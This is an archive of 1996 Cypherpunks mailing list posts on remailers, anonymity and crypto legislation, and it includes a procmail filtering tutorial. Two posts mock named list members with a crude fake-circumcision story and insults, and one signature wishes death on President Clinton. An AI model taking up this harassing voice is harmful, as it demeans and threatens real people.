Sunderland                                     322 Regents Park Road
England                                        London N3 2QQ







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 5 Sep 1996 01:15:00 +0800
To: cypherpunks@toad.com
Subject: Workers of the Web, UNITE!
Message-ID: <v03007807ae5336b86844@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>Tired: Libertarian cypherpunks
>Wired: Crypto-socialists
>

The Wobblies are a prime example of Tom Leherer's comment:

"They won all of the battles, but we had all the good songs."

Up the Revolution.

Martin (crypto social democrat)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 5 Sep 1996 02:17:04 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960904034147.006f6cd4@mail.well.com>
Message-ID: <Pine.SUN.3.91.960904073659.26120B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Sep 1996, Jon Lebkowsky wrote:

> Getting beyond this discussion of EFF, has any global entity discussed
> making remailers illegal? 

Others have responded with information about the Church of Scientology and
similar threats to remailers. I would add that global entities haven't
woken up to the threat of anonymous remailers and that remailers aren't
widely deployed yet -- two conditions that when they change will be
sufficient for a global crackdown.

My cover story in last month's issue of _Internet Underground_ magazine
discussed how governments can move quickly to craft international treaties
that could muzzle the Net. This is what we have to be on the lookout for;
in fact, we need to have a "friendly" country introduce an opposing
proposal that countries can bicker over for decades, while the Net matures
and strengthens and improves its defenses against this type of attack.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Thu, 5 Sep 1996 01:42:54 +0800
Subject: Re: Andrew "skippy" Mathis converts to Judaism - Film at 11
In-Reply-To: <RkcqTD2w165w@bwalk.dm.com>
Message-ID: <199609041444.HAA01429@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! I circumcized Andrew "Skippy" Mathis <qut@netcom.com> with my own hand,
! as the Right Reverend Colin James III pronounced the blessings.
! 
! Igor Chudov, our understudy, sucked out the blood.

No, you forget, Brother Schlomo, Rich Graves did the cutting and
Dr. Fuckhead did the sucking.  From the right hand to the left!
Your a little confused about when you circ'ed Dr. Fuckhead and he
ended up with gangreen, that was before Mr. Graves decided to use
anti-septics, I was the first with the new style rite.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shlomo@bwalk.dm.com (Rabbi Shlomo Ruthenberg)
Date: Thu, 5 Sep 1996 02:13:46 +0800
To: cypherpunks@toad.com
Subject: Andrew "skippy" Mathis converts to Judaism - Film at 11
Message-ID: <RkcqTD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I circumcized Andrew "Skippy" Mathis <qut@netcom.com> with my own hand,
as the Right Reverend Colin James III pronounced the blessings.

Igor Chudov, our understudy, sucked out the blood.

Amen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Thu, 5 Sep 1996 00:03:27 +0800
To: cypherpunks@toad.com
Subject: Re: Voting Monarchist?
In-Reply-To: <42oPTD12w165w@bwalk.dm.com>
Message-ID: <199609041232.IAA20787@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text



Would some kind soul out there be willing to instruct a novice in the
mysteries of procmail? I've finally decided to start killfiling my mail
as well as my news.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
      Hey, Bill Clinton: You suck, and those boys died! I hope you die!
 I feel a groove comin' on             $              Freedom...yeah, right.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael.tighe@Central.Sun.COM (Michael Tighe SUN IMP)
Date: Thu, 5 Sep 1996 01:35:41 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Silenced Machine Guns Are Safer Than TWA
In-Reply-To: <ae50996901021004ef47@[207.167.93.63]>
Message-ID: <199609041352.IAA07442@jeep.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text


>>So?  I was talking about NEW sales of firearms from license holders.  Let's
>>consider improving the future rather than preserving the past, shall
>>we?

>My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you
>meant since the 1968 Gun Control Act. I did not realize that you translate
>"since the 1968 Gun Control Act" into "NEW sales of of firearms."

Well, maybe you are both right. "Since the 1968 Gun Control Act" all
"NEW sales of firearms" from an FFL dealer to the first customer have been
tracked via Form 4473.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Shelby <sshelby.fn.net@wichita.fn.net>
Date: Thu, 5 Sep 1996 01:33:29 +0800
To: cypherpunks@toad.com
Subject: Spam, and how to stop it.
Message-ID: <199609041353.IAA10678@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Sep 04 08:53:00 1996

Hello all.  I assist in running an ISP.  We recently had a problem with 
some of the users massmailing from our server.  We would have never known, 
but someone on CompuServe that didn't like it mailed our support email 
address.  We checked into it, and I called the two people voice.  It pretty 
gratifying to be able to talk to one of these spammer massmailer 'get rich 
quick' scheme people directly.  

What I'm looking for is a way to monitor the amount of mail leaving the 
system per user.  I'm not interested in poking into users mail, but I would 
like the ability to spot other users sending out more than x messages per x 
minutes.  If anyone has any tips on this subject I'd like to hear them.  
Spam and massmailing is one of the major things that's bogging down the net 
these days, I believe.

Thanks



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMi2Xz/uS3FANHwnlAQFDEAQAgj1ngBhFk1J2IEzmWnPROA5RYPgAnkcN
iZPCJ+mnaGppts6MqurCbWv4lPvHZ8Mm6RlMXsPVUCQKu2PsHG6Vmik/3bAZ1D67
V6Zin1bq1027fvsE2i0tbg0t2wWTLgZkFl3JOWxz7nExaLNgM2WNxw3FbgqrnKXa
Ufm7YICPH2I=
=Hr63
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 5 Sep 1996 03:55:19 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Mail OnNet
Message-ID: <3.0b11.32.19960904090523.010d81e8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:10 PM 8/31/96 -0700, Joel McNamara wrote:
>In my never-ending search for the perfect PGP e-mail client, I just
stumbled >on to a beta of a product put out by FTP Software called Mail
OnNet.  Unlike >the Pronto Secure and Pegasus, this client actually has PGP
code (licensed >from PGP Inc.) built directly in.  No shelling out to DOS!

It is very nice.  It is a bit on the hard side to get.  (Took me three
tries.  It seems to time out the transfer if it is not completed within a
certain time frame.  I guess that is what I get for trying to download all
three parts at the same time.)

It does have the beta nature however.  I have found a couple of problems
with the program that make it so that i will not use it beyond testing.  The
people at FTP have been very responsive to e-mail, so I expect the problems
to be fixed soon.  They also seem to have no idea as to what it will retail
for.  With proper marketing, Eudora could be in real trouble.

>Very nice interface and almost complete idiot-proof
>encrypting/decrypting/signing.  Extremely powerful rules based processing too.

The interface design is very clean.  (It is nice seeing well designed dialog
boxes in a product. I have been using too much shareware lately I guess...)
The rules processing looks to be very powerful.  (Puts Eudora 3.0 to shame.)

>Check out:
>
>http://www.ftp.com/mkt_info/onnet32/try.htm
>
>IMHO, this is getting very close to transparent secure e-mail for the masses.

Now all they need is a remailer interface.

>Two notes.  (1) It only runs under Win95 and NT.  (2) It's ITAR restricted.

(3) It is bigger than a battleship.  The distribution is just shy of 10
megs.  Installed it is supposed to be about 45 megs.  (In perspective, a
full install of Visual Basic 4.0 "Professional" is about 50 megs.) 
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Thu, 5 Sep 1996 03:35:46 +0800
Subject: How To Do Cgi Against www.anonymizer.com
Message-ID: <199609041610.JAA17207@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There are two difficult ways to tell how to Cgi your page against
http://www.anonymizer.com:8080/{*}                 

Either ask Rich Graves for the details on how he did it with
http://www.stanford.edu/{*}

or

Use a decent browser client with 100% debugging mode, {and|or}
telnet://www.stanford.edu:80/{*} {and|or}
telnet://www.anonymous.com:8080/http://www.stanford.edu/{*}
and enter a telnet script to find out how he did it.
                                                                               
BTW, how to do telnet scripting and data transfers between two remote 
hosts with standard telnet clients available for Unice shells?  It's 
rediculous to have to sz to my local machine before sz to my remote 
account if I simply want to transfer a file between two remote hosts!  
Yes, I'm aware of the mail utility, I mean telnet.

-- 


         |  |  |  |  |           
           |  |  |  |                                           
         |  |  |  |  |
         _|__|__|__|__
       /--------------\
       |              |
       |  0     0     |--\        
       |     *        |  |
       | \-------/    |  |
       |  \_____/     |__/
        \______________/

       Ÿ-›Æ×'õ‡  áî¨õŽžä




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 5 Sep 1996 01:03:39 +0800
To: cypherpunks@toad.com
Subject: GAR [was:Re: What is the EFF doing exactly?]
Message-ID: <199609041311.JAA14994@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

...

>The reason this is such a hot button for Cypherpunks is that "responsible
>freedom" and "accountability" are often code words for controlling some
>very basic freedoms. Placing limits on anonymous speech would involve some
>very fundamental restrictions on freedoms of various sorts. Even if
>"safeguards" are built-in, the effect would almost certainly be to
>illegalize remailers (unless they had "escrow" features!).

Again, and as Tim is aware, this is not the true meaning of the fine
old word "escrow," which as we all know involves neutral, trusted
third parties. I think that this requires a new term, so I am now
proposing one: "GAR -- Government Access to Remailers." In real life,
the gar is a fish that lives in great numbers in the Everglades, just
west of where I type. They can grow to a very large size. The fossil
record indicates that this species has been around, unchanged, since
dinosaur times. Keeping the Pinnochio tale in mind, I find it quite
fitting that the gar has a *very* long nose in relation to its body.
;)

>And a wide array
>of other freedoms, too numerous for me to write about here.

Indeed.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"Whoever would overthrow the liberty of a nation must begin
 by subduing the freeness of speech." -- Benjamin Franklin

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMi12Nm1lp8bpvW01AQHHRwQAsr2a7rPwC9mfZ/ht2dF1jvRt/yuWJptL
Utg1nm0YY5WrbvA12YAmkYBc4P7/xyqEARlIUWK3Z9qhcMFXjfXMRI5IwyfBmXSQ
Ilra/XIUd6ES2p9jNupiKDO2yn56bpbubVS/T1QFkjRDgrLuRMEUndhNK8n5pGUA
jL2L/IwMVCo=
=seP6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 5 Sep 1996 04:48:51 +0800
To: cypherpunks@toad.com
Subject: 2^1,257,787-1
Message-ID: <2.2.32.19960904165452.006dd000@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok so maybe here in Organ we are a little behind the times but I just heard
about this 378,632 digit prime. Grab your HP11C's and crank out
2^1,257,787-1 courtesy of David Slowinski at Cray.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 5 Sep 1996 04:46:19 +0800
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609041702.KAA15781@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 9/3/96 -0700, James A. Donald wrote:
>At 10:33 PM 9/3/96 -0800, jim bell wrote:
>>>The Leahy crypto bill introduced early this year made (paraphrasing) "the 
>>>use of encryption to thwart a law-enforcement investigation illegal."  I 
>>>immediately pointed out that while this wouldn't make _encrypted_ remailers 
>>>illegal, per se,  effectively it would because the moment an investigation 
>>>(even a phony or trumped-up one) is started and is "thwarted" by the 
>>>encryption used, the remailer operator became guilty of a crime.  
>
>At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote:
>> Is that true? Or is it that the individual user would be guilty of a crime?
>
>Since the individual user would already be guilty of a crime, if he is 
>using the remailer to conceal his crimes, the paragraph in question would
>be fairly useless and irrelevant unless it had the meaning that Jim Bell
>attributes to it.
>
>I believe that judges have a policy of interpreting deliberately 
>ambiguous statutes in whatever way makes the most sense.  The only 
>sensible interpretation of Leahy's bill is that it criminalizes 
>strong remailers, that it is intended to punish ANYONE, not just 
>the criminals themselves, who obstructs investigations.

Moreover, this "spreading the responsibility" philosophy ties in with the 
recent practices (both in the civil and criminal areas) of passing blame 
around.  In civil areas, it's called "deep pockets."  In the criminal area, 
you occasionally see news items about laws making parents criminally liable 
for the actions of their children.

Why WOULDN'T the police want to shut down anonymous remailers?  The Leahy 
bill clearly didn't distinguish between remailer operators and users, so it 
is no leap to conclude that they would be treated similarly.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Sep 1996 17:21:19 +0800
To: SPG <cypherpunks@toad.com
Subject: Re: FWD: Another try to kill democracy
Message-ID: <199609050642.XAA28858@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 PM 9/2/96 +0000, SPG wrote:
> I just got wind that the German government is planning to force german
> ISP's to shut off access to my ISP, XS4ALL, because the german magazine
>'Radikal' has a web page on xs4all.

A few more details please:  What german agency is taking what action.

Has any access been shut off yet, or is it just some two bit asshole 
fascist with delusions of grandeur?

> Please considder mirroring or linking to this site.

Linking is pointless if the site is cut off or access seriously threatened.

Mirroring is appropriate only if access is seriously threatened.

How serious is this threat?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 5 Sep 1996 05:56:34 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960904115249.006b6580@mail.well.com>
Message-ID: <Pine.SUN.3.91.960904104848.27739I-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Harassment in person when someone is shouting at you in the street,
spittle flying in your face, is one thing. 

Online "harassment," I believe, is a problem that can be solved with 
technical means. Don't like someone? Killfile them.

-Declan



On Wed, 4 Sep 1996, Jon Lebkowsky wrote:

> At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
> >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
> >> Not necessarily. The character of the anonymous speech is decisive. If you
> >> use anonymity to cloak harassment, for instance, the anonymity (which
> >> removes accountability) is a problem.  The accountability issue is real and
> >> should be addressed, not evaded.
> >
> >No:  The harassment is the problem, not the anonymity that makes it
> >possible.
> 
> The harassment is one problem, the lack of accountability another. Which is
> not to say that 'lack of accountability' should be 'fixed' by some sort of
> blanket restriction...but it should be acknowledged as a problem.
> 
> --
> Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
> Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
> "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 5 Sep 1996 03:05:41 +0800
To: Martin Minow <cypherpunks@toad.com
Subject: Re: Workers of the Web, UNITE!
Message-ID: <2.2.32.19960904150225.008a22a8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:38 AM 9/4/96 -0700, Martin Minow wrote:
>The Wobblies are a prime example of Tom Leherer's comment:
>
>"They won all of the battles, but we had all the good songs."
>
>Up the Revolution.
>
>Martin (crypto social democrat)

I dreamed I saw Joe Hill last night,
Alive as you or me
Says I, "But Joe, you're ten years dead,"
"I never died," says he
"I never died," says he

"The copper bosses killed you, Joe,
They shot you, Joe," says I.
"Takes more than guns to kill a man,"
Says Joe, "I didn't die,"
Says Joe, "I didn't die."

See:  http://www.bluemarble.net/~mitch/iww/lrs.html for more.

DCF

"Who wonders where his IWW card is -- 'Unemployed Worker' (Student) Dues 50
cents a month."  It was the only organization on the Attorney General's list
I could still join in 1970.  You had to be there... 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 5 Sep 1996 04:40:58 +0800
To: Rick Smith <smith@sctc.com>
Subject: Re: Moscowchannel.com hack
In-Reply-To: <199609031548.KAA04410@shade.sctc.com>
Message-ID: <Pine.LNX.3.93.960904111229.918C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Sep 1996, Rick Smith wrote:
> : On Sat, 31 Aug 1996, Joel McNamara wrote:
> : > Just a matter of time before some builds a dedicated Satan type tool that
> : > scans for  HTTP server holes or messed up file permissions to make locating
> : > potential victims easy.
> Snow replied:
> : Write your web site to a CD-ROM and hard-code the base directory into the
> : webserver.
> Or host it on something with mandatory access control protections.
> There are still a handful of us building such things, and they can
> give really good protection to web page contents.

     Could you illuminate me on this subject please? I am working with a 
potential client who may need a fairly secure web server. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 5 Sep 1996 06:17:58 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: How to use procmail
Message-ID: <9609041821.AA27906@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



"Damaged Justice" writes:
> Would some kind soul out there be willing to instruct a novice in the
> mysteries of procmail? I've finally decided to start killfiling my mail
> as well as my news.

A fine idea.  Procmail makes the Cypherpunks list infinitely more readable.


1) First, here's how to get it:

----------------------
A recent version can be picked up at various comp.sources.misc archives.
The latest version can be obtained directly from the ftp-archive at:

        amaru.informatik.rwth-aachen.de (137.226.112.31)

        as compressed tar file:         pub/unix/procmail.tar.Z         <100KB
        or in compressed shar format:   pub/unix/procmail.0?.Z
----------------------


2) Build the procmail program and install it in a suitable location.  I
have no idea what your familiarity with UNIX and C is; you may want to
have your sysadmin help you with this.  Alternatively, you could use
Alta Vista or equivalent to search for binaries for your system.


3) Create a file of procmail "recipes", which tell it how to process
your mail.  This file is called "$HOME/.procmailrc".  Mine begins like
this; fix up directory names as needed for your system:

-----------------------
#
# $HOME/.procmailrc  -  procmail recipe file
#
PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin:$HOME/bin/700o:$HOME/bin
ME=             janzen
HOME=           /Home/$ME
LOGFILE=        $HOME/.procmaillog
MAILDIR=        $HOME/Mail
ORGMAIL=        /usr/mail/$ME
DEFAULT=        $ORGMAIL
TMP=            $HOME/tmp
SENDMAIL=       /usr/lib/sendmail
TMPFILE=        $TMP/procmail.$$
LOCKFILE=       $HOME/Mail/.procmail

# toss out junk mail
:1
^Subject:.*unsubscribe
/dev/null

# sort mail from mailing lists into the proper folders
:1
cypherpunks
Cypherpunks
-----------------------

The last part sorts all mail whose header contains the word "cypherpunks"
into the folder $MAILDIR/Cypherpunks.  Now the fun part -- writing your
"recipes"!  You can get as specific as you want: 

-----------------------
# kill a particular thread
:2
^To:.*cypherpunks@toad.com
^Subject:.*Workers of the
/dev/null

# ignore a particular user
:2
cypherpunks
patrickbc@juno.com
/dev/null

# I haven't tried this one, but any subject with too many consecutive
# capitals is probably spam or worse.  Separate it out, but don't toss
# it just yet.
:2
cypherpunks
^Subject:.*[A-Z][A-Z][A-Z][A-Z][A-Z][A-Z]
ProbableSpam

# search the whole message body, not just the headers, for probable spam
:1HB
^dear friend
ProbableSpam

# put everything else in the incoming Cypherpunks mail folder
:1
^To:.*cypherpunks@toad.com
NewCypherpunksMail
-----------------------

Rules are evaluated in top-to-bottom order; first matching rule wins.
Anything not matched ends up in your usual $ORGMAIL folder.


4) Run your incoming mail through procmail.  To do this, most Unix systems
let you create a file called "$HOME/.forward" with the following contents
(including the quotes):

"| IFS=' '; /usr/local/bin/procmail -p"

(Replace "/usr/local/bin" with the directory in which you installed procmail.)


5) One thing to watch out for:  procmail is executed on the machine which
handles your mail.  If this machine has a different architecture than your
own machine, you must build procmail for the mail handling machine, not
your own.

Also, the permissions on your $HOME/.forward and $HOME/.procmailrc files
must be set so that they are readable on the mail handling machine.  If
your home directory is NFS-mounted, this should happen automatically;
otherwise, you may need to copy them to the mail handling machine manually.

Finally, the procmail process may not have your userid, so you must make
these files world-readable:

chmod 644 $HOME/.forward $HOME/.procmailrc

For the first day or two, check your $HOME/.procmaillog file frequently
to see whether there are any problems.  Check with your sysadmin to make
sure that your mail isn't ending up "all over the floor".  Send yourself
mail to test "recipes".


6) Once it's running smoothly, you can get fancy and run the following
shell script, which reads the $HOME/.procmaillog file and produces a nice
summary, sorted by mail folder:

-------------------------------------------------------------------------------
#!/bin/sh
# Summarize the ~/.procmaillog file

LOGFILE=${LOGFILE:=$HOME/.procmaillog}

echo "Subject: Procmail Summary"
echo " "

sort ${LOGFILE} | /usr/bin/awk '
/^  Folder:/ {
        folder = $2;
        nbytes = $3;
        msgcount[folder] += 1;
        totalbytes[folder] += nbytes;
}

END {
        for (folder in msgcount)
                printf "Folder %s:\tsaved %d messages (%d bytes)\n", \
                        folder, msgcount[folder], totalbytes[folder];
}
'

if [ "$1" = "-clear" ]; then rm -f $LOGFILE; fi
-------------------------------------------------------------------------------

To arrange to have it run daily, I use the following crontab entry:

0 7 * * * /Home/janzen/bin/pmsumm.sh -clear | elm -s "Procmail Summary" janzen

which means, "At 7:00AM every morning, run the pmsumm.sh script, use the
Elm mailer to mail the output to me, and then clear $HOME/.procmaillog".
See the "cron" man page for your system, and/or talk to your sysadmin,
since this varies among different flavors of Unix.


Hope this helps...

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 06:10:19 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <ae53180700021004bb01@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 9/4/96, Jon Lebkowsky wrote:
>At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>>> Not necessarily. The character of the anonymous speech is decisive. If you
>>> use anonymity to cloak harassment, for instance, the anonymity (which
>>> removes accountability) is a problem.  The accountability issue is real and
>>> should be addressed, not evaded.
>>
>>No:  The harassment is the problem, not the anonymity that makes it
>>possible.
>
>The harassment is one problem, the lack of accountability another. Which is
>not to say that 'lack of accountability' should be 'fixed' by some sort of
>blanket restriction...but it should be acknowledged as a problem.

It has been. In many hundreds of articles addressing aspects of the issue.

The fact that Esther Dyson and others think advocates of the right to be
anonymous claim that these issues are not being considered just shows that
Esther and others are not aware of these many articles.

Nor can every brief post--such as the one James Donald made above--include
a fully-nuanced, fully-balanced discussion of all issues. Saying that an
advocate for a position has not considered the alternate positions is
usually incorrect.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 06:15:29 +0800
To: cypherpunks@toad.com
Subject: Re: 2^1,257,787-1
Message-ID: <ae5319880002100415b9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:54 PM 9/4/96, John F. Fricker wrote:
>Ok so maybe here in Organ we are a little behind the times but I just heard
>about this 378,632 digit prime. Grab your HP11C's and crank out
>2^1,257,787-1 courtesy of David Slowinski at Cray.

The news sites on the Web I looked at had the announcement, but not the number.

Thanks. I've already modified my .sig.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Sep 1996 06:25:37 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609040057.RAA01205@mail.pacifier.com>
Message-ID: <199609041827.LAA29523@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell <jimbell@pacifier.com>
>"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
>decades, people have been able to walk up to a pay telephone at 3:00 AM and 
>make a harassing phone call to somebody, a "problem" which still exists and 
>no solution is being implemented for.

amusing the way you phrase that-- you didn't say, "phone", but "pay 
phone". the statement used to hold in general for all "phones", but
then caller id, caller blocking, etc. have been introduced that
make this no longer true. so in a very real sense, anonymity in 
the phone system was considered a "problem" by some that has been
"solved" or "modified" by some recent advancements. (yes, most people
agree caller ID is an advancement).

I think cpunks should hold the view that communication is a matter
of mutual consent between sender and receiver. if a receiver says,
"I don't want any anonymous messages", then should be able to block them.
this is essentially what is happening with the remailers *right*now*,
if you ask any remailer operator. people ask not to receive anonymous
mail, and are put on the blocking lists. imho only the extremists are arguing,
and have always argued, that they should have some ability to put
an anonymous message in front of someone else against their will.

this basic rule becomes more murky when you look at public forums,
because you can't really say whether given individuals reading them want to
hear something anonymous or not. by designing the forum beforehand
to force the situation, you solve this problem. 

I do believe that in the future there will be all types of forums: those in 
which identity is required, those in which it is optional, and those in
which it is always cloaked. this is eminently reasonable imho.
those who argue against one of the 
above's existence (such as saying it involves a ghettoization
of anonymity, that there should always be an ability to be anonymous
in any communication setting) are extremists imho.

the above is almost exactly what Dyson was saying, and I have been
advocating this position for a long time. again, I think anyone who rejects
the above is an extremist. there are different ways to support or restrict
anonymity, some of them extremist. those who argue for no restrictions
anywhere don't have a clue about reality imho.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Sep 1996 06:43:35 +0800
To: cypherpunks@toad.com
Subject: flimflamery on anonymity
In-Reply-To: <199609041557.IAA00970@dns1.noc.best.net>
Message-ID: <199609041839.LAA00713@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



james donald:
>Lucky Green and Dark Unicorn are not accountable.  This is a problem?
> Because it is a problem "We" need to do something about it, 

(last line is sarcasm for the sarcasm impaired)
a cpunk position I have seen repeated often. it goes along a very
simplistic line of reasoning that I have seen TCM evoke repeatedly.
it rather annoys me. it goes like this:

cyberspace is merely discussion between people. anonymity should
be allowed anywhere there are discussions (its a free speech issue). 
therefore it should be possible everywhere in cyberspace.

this idea lacks a lot of subtlety in thought and to my mind is
tremendously simplistic. first, it suggests that cyberspace as
we now see it is the way it will always be. but that is ridiculous.
what we have today in cyberspace is something like a sophomoric
debate society. it's gradually increasing in professionalism with
the rise of web sites etc.

cyberspace is going to grow to become a lot more than a debate
society, and is in this progress right now. whenever challenged
on anonymity in certain contexts, the extremist cpunk position
is to blur the issue into one of free speech. but the issue is
much different if we are talking about a professional situation.
scientists demand that each other be "accountable" for their
work, for example, and pseudonymous publication simply would
not be acceptable.

cpunks will also argue that anonymity can suffice for any 
business transaction. that may be so, but what about a business
that simply says, "we choose to require identity among our
customers, and you can go elsewhere if you disagree". the 
extremist cypherpunks would be in a quandary over this example,
because they think they can support anarchocapitalist 
freedom and anonymity at the same time. they will argue that
such a business will one day not exist. but shouldn't a business be 
free to make this decision? rabid cpunks would probably 
argue against such a decision.

cyberspace as a whole is *not* going to lead to a totlal motion
away from physical identity. in some ways physical identity will
be more strictly enforced in cyberspace, in "some regions".
there will be other regions of cyberspace in which "anything goes".

anyway, I want to emphasize my main point, that *anonymity* is
not merely about debate societies. it's about human interaction.
any time two or more humans interact in a host of ways that
go beyond communication (such as business transactions, professional
societies, etc) its going far beyond mere speech.

of course in the cpunk mailing list, who cares if there are
anonymous/pseudonymous participants? but using this as a metaphor
for anonymity in general shows a pathetic lack of sophistication
